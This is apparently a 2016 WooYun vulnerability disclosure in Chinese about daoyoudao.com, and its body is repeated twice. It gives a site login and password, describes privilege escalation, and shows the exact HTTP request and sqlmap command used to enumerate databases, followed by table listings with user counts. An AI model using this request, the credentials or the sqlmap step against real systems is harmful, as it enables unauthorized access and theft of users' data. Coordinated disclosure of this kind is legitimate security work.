当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189559

漏洞标题:道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

相关厂商:daoyoudao.com

漏洞作者: 黑色键盘丶

提交时间:2016-03-27 12:18

修复时间:2016-05-12 10:40

公开时间:2016-05-12 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-27: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

315被曝光APP恶意吸费,但是下架APP就是防止APP不被篡改的方法吗

详细说明:

jiayoubama 密码1234567

1.png


发现个权限大的号,管理的地区多,直接改密码

2.png


编辑页可直接修改

3.png


消息管理处越权查看任意信息

4.png


5.png


客服管理客服这里编辑

76.png


随便改一个

8.jpg


SQL注入POST

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
Host: m.mb.daoyoudao.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260


注入:F:\sqlmap>sqlmap.py -r 2.txt --dbs


数据库14个可垮裤查询 8w多订单 77w用户

9.png


主库表

Database: trade_01
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| f_client                 | 1141415 |
| f_msg                    | 517520  |
| f_loginlog               | 241888  |
| f_user                   | 176616  |
| f_product                | 173435  |
| f_freight                | 151668  |
| f_order_detail           | 116543  |
| f_product_attr_price     | 92166   |
| f_order                  | 82834   |
| f_product_subcat         | 76581   |
| f_product_11970_13849    | 73203   |
| f_product_copy           | 71224   |
| f_user_address           | 53635   |
| f_paydetail              | 49290   |
| f_product_attr           | 45317   |
| f_freefreight            | 44025   |
| f_page                   | 40193   |
| f_msg_product            | 31462   |
| f_cat_attr_value         | 29875   |
| dic_category             | 25700   |
| f_order_copy             | 21481   |
| f_paydetail_copy         | 14624   |
| f_fs_guanggao            | 7441    |
| f_category               | 4495    |
| f_guanggao               | 4391    |
| f_gglist_affiliated      | 4300    |
| f_information            | 4176    |
| f_order_operating_record | 3929    |
| f_cat_attr               | 3888    |
| f_client_copy            | 3353    |
| f_leaveword              | 2688    |
| f_user_group_relate      | 2554    |
| temp_msg                 | 2012    |
| f_favorites              | 863     |
| f_share                  | 826     |
| f_store                  | 574     |
| f_promotions             | 434     |
| f_usergroup              | 379     |
| f_quota                  | 330     |
| temp_user_id             | 211     |
| f_promotions_product     | 96      |
| f_adv                    | 46      |
| temp_mobile              | 2       |
+--------------------------+---------+


17w用户跑出数据证明下

10.png


数据库androidpn 60w用户

Database: androidpn
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| apn_user         | 608395  |
| apn_notification | 56547   |
+------------------+---------+


漏洞证明:

jiayoubama 密码1234567

1.png


发现个权限大的号,管理的地区多,直接改密码

2.png


编辑页可直接修改

3.png


消息管理处越权查看任意信息

4.png


5.png


客服管理客服这里编辑

76.png


随便改一个

8.jpg


SQL注入POST

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
Host: m.mb.daoyoudao.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260


注入:F:\sqlmap>sqlmap.py -r 2.txt --dbs


数据库14个可垮裤查询 8w多订单 77w用户

9.png


主库表

Database: trade_01
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| f_client                 | 1141415 |
| f_msg                    | 517520  |
| f_loginlog               | 241888  |
| f_user                   | 176616  |
| f_product                | 173435  |
| f_freight                | 151668  |
| f_order_detail           | 116543  |
| f_product_attr_price     | 92166   |
| f_order                  | 82834   |
| f_product_subcat         | 76581   |
| f_product_11970_13849    | 73203   |
| f_product_copy           | 71224   |
| f_user_address           | 53635   |
| f_paydetail              | 49290   |
| f_product_attr           | 45317   |
| f_freefreight            | 44025   |
| f_page                   | 40193   |
| f_msg_product            | 31462   |
| f_cat_attr_value         | 29875   |
| dic_category             | 25700   |
| f_order_copy             | 21481   |
| f_paydetail_copy         | 14624   |
| f_fs_guanggao            | 7441    |
| f_category               | 4495    |
| f_guanggao               | 4391    |
| f_gglist_affiliated      | 4300    |
| f_information            | 4176    |
| f_order_operating_record | 3929    |
| f_cat_attr               | 3888    |
| f_client_copy            | 3353    |
| f_leaveword              | 2688    |
| f_user_group_relate      | 2554    |
| temp_msg                 | 2012    |
| f_favorites              | 863     |
| f_share                  | 826     |
| f_store                  | 574     |
| f_promotions             | 434     |
| f_usergroup              | 379     |
| f_quota                  | 330     |
| temp_user_id             | 211     |
| f_promotions_product     | 96      |
| f_adv                    | 46      |
| temp_mobile              | 2       |
+--------------------------+---------+


17w用户跑出数据证明下

10.png


数据库androidpn 60w用户

Database: androidpn
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| apn_user         | 608395  |
| apn_notification | 56547   |
+------------------+---------+


修复方案:

你懂得 修改密码啦

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-28 10:40

厂商回复:

非常感谢!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-27 12:19 | 奶嘴 ( 普通白帽子 | Rank:357 漏洞数:93 | 16岁的毛孩有些厂商故意加你好友,和你聊...)

    好样的

  2. 2016-03-27 13:18 | DeadSea ( 普通白帽子 | Rank:214 漏洞数:61 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

    可以不用吃屎了~

  3. 2016-03-27 13:33 | 小龙 ( 普通白帽子 | Rank:2293 漏洞数:483 | 我就问,还有谁!!!!!!!!!!!!!...)

    315后续再次施加压力,键盘你好样的。程序员保证不打屎你。。。

  4. 2016-03-27 14:01 | 黑色键盘丶 ( 普通白帽子 | Rank:1336 漏洞数:298 | 哥,是孤独风中的一匹狼)

    @小龙 社会我龙哥6

  5. 2016-03-27 14:49 | Aasron ( 普通白帽子 | Rank:760 漏洞数:149 | raw_input("你知道我要输入什么?"))

    记得黑色键盘曾经是我看过的一本黑客小说作者

  6. 2016-03-27 14:55 | 黑色键盘丶 ( 普通白帽子 | Rank:1336 漏洞数:298 | 哥,是孤独风中的一匹狼)

    @Aasron 666

  7. 2016-03-27 15:05 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件,2859857@gmail.com,垃圾邮...)

    @黑色键盘丶 说好的吃屎呢?

  8. 2016-03-27 15:07 | 黑色键盘丶 ( 普通白帽子 | Rank:1336 漏洞数:298 | 哥,是孤独风中的一匹狼)

    @’‘Nome sea吃

  9. 2016-03-27 16:13 | Format_smile ( 普通白帽子 | Rank:484 漏洞数:172 | ···孰能无过,谁是谁非!)

    干得漂亮